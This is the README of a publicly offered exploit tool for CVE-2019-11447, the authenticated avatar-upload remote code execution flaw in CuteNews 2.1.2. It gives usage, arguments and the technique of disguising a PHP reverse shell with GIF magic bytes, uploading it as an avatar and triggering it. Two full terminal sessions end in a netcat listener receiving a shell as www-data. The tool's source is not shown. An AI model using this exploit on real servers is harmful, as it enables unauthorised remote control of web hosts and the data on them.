Exploit Code for CVE-2019-11447 aka CuteNews 2.1.2 Avatar upload RCE (Authenticated)
Exploit Links:
Expected outcome: Login/Register an account, craft user selected PHP file with .gif magic bytes, uploads the file as an avatar and trigger it to achieve Remote Code Execution.
Intended only for educational and testing in corporate environments.
This Exploit was tested on Python 3.8.6
cfx: ~/cutenews
→ ./exploit.py -h
usage: exploit.py [-h] [-l URL] [-u USERNAME] [-p PASSWORD] [-e EMAIL]
CuteNews 2.1.2 Avatar upload RCE (Authenticated) by ColdFusionX
optional arguments:
-h, --help show this help message and exit
-l URL, --url URL CuteNews URL (Example: http://127.0.0.1)
-u USERNAME, --username USERNAME
Username to Login/Register
-p PASSWORD, --password PASSWORD
Password to Login/Register
-e EMAIL, --email EMAIL
Email to Login/Register
Exploit Usage :
./exploit.py -l http://127.0.0.1 -u cold -p fusion -e cold@decepticon.net
./exploit.py -l http://127.0.0.1 -u optimus -p prime -e optimus@autobots.net
[^] Select your PHP file -> rev.php
OR
[^] Select your PHP file -> ~/Downloads/rev.php
[^] Press y/n to trigger reverse shell -> y
This exploit expects four arguments to run initially :
- -l : CuteNews URL
- -u : Username required to Login/Register
- -p : Password required to Login/Register
- -e : Email required to Login/Register
Additional required user inputs:
- Select your PHP file -> Here the user has to specify the PHP file to be uploaded, it can be any PHP file Example: PHP info, PHP reverse shell. If the PHP file is located in the same directory as of the exploits then the user can just specify the file name:
Example: [^] Select your PHP file -> rev.php
Orelse, user need to specify the location of PHP file:
Example: [^] Select your PHP file -> ~/Downloads/rev.php
- Press y/n to trigger reverse shell -> Here if the user has uploaded an PHP reverse shell, he/she has the choice whether to trigger the reverse shell using y/n.
Either way the exploit is designed to print out the uploaded file location for further use.
- Scenario 1 > Login with existing credentials and getting a reverse shell:
cfx: ~/cutenews
→ ./exploit.py -l http://127.0.0.1 -u optimus -p prime -e optimus@autobots.net
[+] CuteNews 2.1.2 Avatar Upload RCE exploit by ColdFusionX
[+] User exists ! Logged in Successfully
[^] Select your PHP file -> rev.php
[*] Adding Magic Byte to PHP file
[+] Upload Successful !!
[*] File location --> http://10.10.10.206/CuteNews/uploads/avatar_cold_cold.php
[^] Press y/n to trigger PHP file -> y
[*] Check listener for reverse shell
[*] Execution Completed
cfx: ~/cutenews
→ nc -lvnp 8020
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::8020
Ncat: Listening on 0.0.0.0:8020
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:32868.
Linux passage 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
03:06:04 up 4:15, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
prime tty7 :0 22:50 4:15m 9.36s 0.69s /sbin/upstart --user
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ exit
- Scenario 2 > Registering new user and getting a reverse shell:
cfx: ~/cutenews
→ ./exploit.py -l http://127.0.0.1 -u cold -p fusion -e cold@decepticons.net
[+] CuteNews 2.1.2 Avatar Upload RCE exploit by ColdFusionX
[+] Credentials cold:fusion Successfully Registered
[^] Select your PHP file -> rev.php
[*] Adding Magic Byte to PHP file
[+] Upload Successful !!
[*] File location --> http://127.0.0.1/CuteNews/uploads/avatar_cold_cold.php
[^] Press y/n to trigger PHP file -> y
[*] Check listener for reverse shell
[*] Execution Completed
cfx: ~/cutenews
→ nc -lvnp 8020
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::8020
Ncat: Listening on 0.0.0.0:8020
Ncat: Connection from 127.0.0.1.
Ncat: Connection from 127.0.0.1:32868.
Linux passage 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
03:06:04 up 4:15, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
prime tty7 :0 22:50 4:15m 9.36s 0.69s /sbin/upstart --user
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ exit